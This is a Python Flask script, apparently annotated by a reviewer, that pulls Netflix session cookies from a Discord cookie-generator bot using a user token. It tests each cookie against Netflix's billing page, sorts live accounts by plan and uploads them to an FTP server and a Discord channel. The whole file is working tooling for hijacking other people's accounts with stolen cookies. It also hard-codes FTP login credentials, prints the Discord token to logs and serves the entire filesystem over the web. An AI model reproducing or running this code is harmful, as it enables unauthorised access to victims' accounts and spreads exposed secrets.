| import re |
| import requests |
| from bs4 import BeautifulSoup |
| from deep_translator import GoogleTranslator |
| import glob |
| import os |
| import shutil |
| import string |
| import random |
| from flask import Flask, abort, send_file, render_template |
| from flask_autoindex import AutoIndex |
| from threading import Thread |
| import time |
| import json |
| from urllib.parse import unquote |
| from ftplib import FTP_TLS |
# Remove the stale test cookie left by a previous run; tolerate its
# absence so a fresh deployment does not crash at import time
# (the original unconditional os.remove raised FileNotFoundError).
try:
    os.remove("./cookies/test.txt")
except FileNotFoundError:
    pass
|
|
class Unbuffered(object):
    """Stream proxy that flushes the wrapped stream after every write.

    Used below to force stdout to flush immediately so log lines show
    up in real time on the hosting platform.
    """

    def __init__(self, stream):
        self.stream = stream

    def write(self, data):
        target = self.stream
        target.write(data)
        target.flush()

    def writelines(self, datas):
        target = self.stream
        target.writelines(datas)
        target.flush()

    def __getattr__(self, attr):
        # Everything not overridden here is delegated to the wrapped stream.
        return getattr(self.stream, attr)
# Make stdout flush on every write so prints appear immediately in hosted logs.
import sys
sys.stdout = Unbuffered(sys.stdout)
|
|
|
|
def send_retrieve_cookie_msg(channelid):
    """Ask the Discord cookie-gen bot for a Netflix cookie, then download
    the attachment from the latest message in *channelid* into ./cookies/
    as a Netscape-format cookie file with a random name.

    channelid: id of the channel whose newest message carries the .txt
    attachment produced by the bot.
    """
    print("getting cookie")
    secret = os.environ['DISCORD_CODE']  # Discord user token
    print(secret)
    data = {"content": "c.gen netflix"}
    headers = {"authorization": secret}
    r = requests.post(
        "https://discord.com/api/v9/channels/1186365728278990938/messages",
        data=data,
        headers=headers)
    # Give the bot time to reply with the generated cookie.
    time.sleep(10)
    os.chdir("./cookies/")
    try:
        if r.status_code != 429:
            r = requests.get(
                # FIX: removed the stray leading space that made the URL
                # malformed in the original f-string.
                f'https://discord.com/api/v9/channels/{channelid}/messages?limit=1',
                headers=headers)
            jsonn = json.loads(r.text)
            for value in jsonn:
                ran = ''.join(
                    random.choices(string.ascii_uppercase + string.digits, k=6))
                try:
                    attachment_url = value['attachments'][0]['url']
                    filename = ran + ".txt"
                    response = requests.get(attachment_url)
                    # Close handles deterministically (originals leaked them).
                    with open("old" + filename, "wb") as raw:
                        raw.write(response.content)
                    # Rewrite without blank lines, prepending the Netscape
                    # header line that cookie parsers expect.
                    wrote_header = False
                    with open("old" + filename, 'r') as src, \
                            open(filename, 'w') as out:
                        for line in src:
                            if line.strip():
                                if not wrote_header:
                                    out.write("# Netscape HTTP Cookie File\n")
                                    wrote_header = True
                                out.write(line)
                    os.remove("old" + filename)
                except Exception as e:
                    # Best-effort per message: no attachment / bad download.
                    print(e)
        else:
            print("cooldown")
    finally:
        # Always restore the working directory, even on error
        # (the original could strand the process inside ./cookies/).
        os.chdir("../")
|
|
|
|
def parseCookieFile(cookiefile):
    """Parse a Netscape-format cookies.txt file into a ``{name: value}``
    dict compatible with ``requests``.

    Comment lines and blank lines are skipped; lines with fewer than
    7 tab-separated fields are reported and ignored.
    (The original's dead ``x == "fail"`` branch could never trigger and
    has been removed; a dict is always returned.)
    """
    cookies = {}
    with open(cookiefile, 'r') as fp:
        for line in fp:
            # Skip the "# Netscape HTTP Cookie File" header / comments.
            if line.startswith('#'):
                continue
            # Skip blank lines silently (original printed "Invalid cookie").
            if not line.strip():
                continue
            fields = line.strip().split('\t')
            try:
                # Netscape format: field 5 = name, field 6 = value.
                cookies[fields[5]] = fields[6]
            except IndexError:
                print("Invalid cookie")
    return cookies
|
|
|
|
def getNetflixInfo(cookiefile):
    """Check whether *cookiefile* holds a live Netflix session.

    Dead cookies (redirected to the login page) are deleted. Cookies
    with an active plan are renamed to "<billing date> <plan> <lang>
    (<rand>).txt", uploaded to the FTP backup host, and removed
    locally. Anything that fails parsing (no plan, page layout change,
    upload error) is logged and moved to ../NoMembership/.
    """
    cookies = parseCookieFile(cookiefile)
    if cookies == "fail":
        os.remove(cookiefile)
        print("cookie removed")
        return

    r = requests.get("https://www.netflix.com/BillingActivity",
                     cookies=cookies)
    print(r.url)
    if "login" in r.url:
        # Netflix bounced us to the login page: cookie no longer works.
        print("Login Page")
        os.remove(cookiefile)
        return

    soup = BeautifulSoup(r.content, "html.parser")
    try:
        print(r.url)
        billingDate = soup.find("div", {"data-uia": "streaming-next-cycle"})
        print(billingDate)
        billingDate = billingDate.get_text()
        planName = soup.find("div", {"data-uia": "plan-name"})
        print(planName)
        planName = planName.get_text()
        billingDate = GoogleTranslator(source='auto',
                                       target='en').translate(billingDate)
        # Tag English-language accounts; anything else gets no tag.
        lang = "English" if soup.find("html", {"lang": "en"}) is not None else ""
        planName = GoogleTranslator(source='auto',
                                    target='en').translate(planName)

        print(billingDate + " " + planName + " " + lang)
        ran = ''.join(
            random.choices(string.ascii_uppercase + string.digits, k=3))
        newCookiefile = ("../Membership/" + billingDate + " " + planName +
                         " " + lang + " (" + ran + ").txt")
        shutil.move(cookiefile, newCookiefile)
        # BUG FIX: the original called ftplib.FTP(...), but only FTP_TLS
        # is imported (from ftplib import FTP_TLS), so this always raised
        # NameError and every good cookie fell into the except branch.
        # Reuse the shared connect() helper instead.
        session = connect()
        with open(newCookiefile, 'rb') as fh:
            # basename(): the local name carries a ../Membership/ prefix
            # that must not leak into the remote STOR path.
            session.storbinary(
                'STOR ./public_html/Membership/' +
                os.path.basename(newCookiefile), fh)
        session.quit()
        os.remove(newCookiefile)
    except Exception as e:
        # Parse/upload failed: log the error and park the cookie.
        print(e)
        with open("../Membership/error.txt", "a") as f:
            f.write(str(e) + "\n\n")
        print("\n Moving in noMember")
        ran = ''.join(
            random.choices(string.ascii_uppercase + string.digits, k=10))
        shutil.move(cookiefile, '../NoMembership/NoMember' + ran + ".txt")
|
|
|
|
def mainTask():
    """Fetch fresh cookies from Discord, then validate each one."""
    print("running cookie retriever")
    send_retrieve_cookie_msg(1191381755731644418)
    time.sleep(5)
    print("running netflix checker")
    os.chdir('./cookies/')
    for cookie_name in glob.glob("*.txt"):
        print(cookie_name)
        getNetflixInfo(cookie_name)
    os.chdir('../')
|
|
def testTask():
    """Validate the fixed reference cookie kept in ./cookietest/."""
    os.chdir('./cookietest/')
    getNetflixInfo("./cookie.txt")
    os.chdir("../")
|
|
def connect():
    """Open and return an authenticated FTPS session to the backup host.

    NOTE(security): host and credentials are hard-coded here (and
    duplicated in getNetflixInfo); they should be moved to environment
    variables like DISCORD_CODE.
    """
    ftp = FTP_TLS()
    # Verbose protocol tracing of the FTP control connection.
    ftp.debugging = 2
    ftp.connect('hashir672.serv00.net')
    ftp.login('f6857_hashir_serv00', 'Hashirisbest@1122')
    return ftp
|
|
|
|
def backupTask(location, filename):
    """Zip *location* and post the archive to the backup Discord channel.

    The local ./Membership mirror is first refreshed: its .txt files are
    deleted and re-downloaded from the live copy on the FTP host (the
    FTP session is used for the listing, HTTP for the file bodies).

    location: directory to archive (e.g. "./Membership").
    filename: archive base name; "<filename>.zip" is created in cwd.
    """
    # Refresh the local Membership mirror from the server.
    for stale in glob.glob("./Membership/*.txt"):
        os.remove(stale)
    print('1')
    session = connect()
    print("1")
    session.voidcmd("NOOP")  # confirm the control channel is alive
    session.cwd('./public_html/Membership')
    names = session.nlst()
    # FIX: some servers omit "." / ".." from NLST; the original
    # unconditional list.remove() raised ValueError in that case.
    for dot in (".", ".."):
        if dot in names:
            names.remove(dot)
    for name in names:
        r = requests.get("https://hashir672.serv00.net/Membership/" + name)
        # FIX: close each downloaded file (original leaked the handle).
        with open("./Membership/" + name, "wb") as out:
            out.write(r.content)
    session.quit()

    shutil.make_archive('./' + filename, 'zip', location)
    header = {
        'authorization': os.environ['DISCORD_CODE'],
    }
    channel_id = "1193267345079156746"
    # FIX: open the archive in a with-block so the handle is released
    # after the upload (original never closed it).
    with open("./" + filename + ".zip", 'rb') as archive:
        files = {
            "file": ("./" + filename + ".zip", archive)
        }
        requests.post(
            f"https://discord.com/api/v9/channels/{channel_id}/messages",
            headers=header, files=files)
|
|
# Flask app serving the Membership file browser and the task-trigger routes below.
app = Flask(__name__)
|
|
|
|
@app.route('/', defaults={'req_path': ''})
@app.route('/<path:req_path>')
def dir_listing(req_path):
    """Serve files and directory listings from ./Membership.

    Files are sent directly; directories render files.html with their
    entries; anything outside BASE_DIR or nonexistent returns 404.
    """
    BASE_DIR = './Membership'

    # SECURITY FIX: the original joined the raw user path (then
    # unquoted it), allowing ../ traversal out of ./Membership and
    # leaking the resolved server path for missing files. Decode
    # first, resolve, and confine the result to BASE_DIR.
    req_path = unquote(req_path)
    base = os.path.realpath(BASE_DIR)
    abs_path = os.path.realpath(os.path.join(base, req_path))
    if abs_path != base and not abs_path.startswith(base + os.sep):
        abort(404)

    if os.path.isfile(abs_path):
        return send_file(abs_path)

    if not os.path.exists(abs_path):
        # 404 instead of echoing the resolved filesystem path.
        abort(404)

    files = os.listdir(abs_path)
    return render_template('files.html', files=files)
|
|
|
|
@app.route('/alive')
def alive():
    """Health-check endpoint for keep-alive pingers."""
    status = "Keep Alive"
    return status
|
|
|
|
@app.route('/main')
def main():
    """Kick off the full fetch-and-check cycle in a background thread."""
    worker = Thread(target=mainTask)
    worker.start()
    return 'Hello from Flask!'
@app.route('/test')
def test():
    """Run the single-cookie sanity check in a background thread."""
    worker = Thread(target=testTask)
    worker.start()
    return 'Hello from Flask! test'
|
|
@app.route('/backup')
def backup():
    """Start a background backup of ./Membership; returns immediately."""
    thr = Thread(target=backupTask, args=("./Membership", "backup"))
    print("backup Start")
    thr.start()
    # FIX: corrected "Memberhship" typo in the response text.
    return 'Backup Started of Membership'
|
|
@app.route('/backupNoMembership')
def backupNoMembership():
    """Start a background backup of ./NoMembership; returns immediately."""
    thr = Thread(target=backupTask, args=("./NoMembership", "backupNoMembership"))
    thr.start()
    # FIX: corrected "NoMemberhship" typo in the response text.
    return 'Backup Started of NoMembership'
|
|
|
|
# Root browsed by flask_autoindex below.
ppath = "/"


# NOTE(review): browse_root="/" exposes the host's entire filesystem via
# AutoIndex, not just the app directory — confirm this is intentional.
AutoIndex(app, browse_root=ppath)
| |
|
|
|
|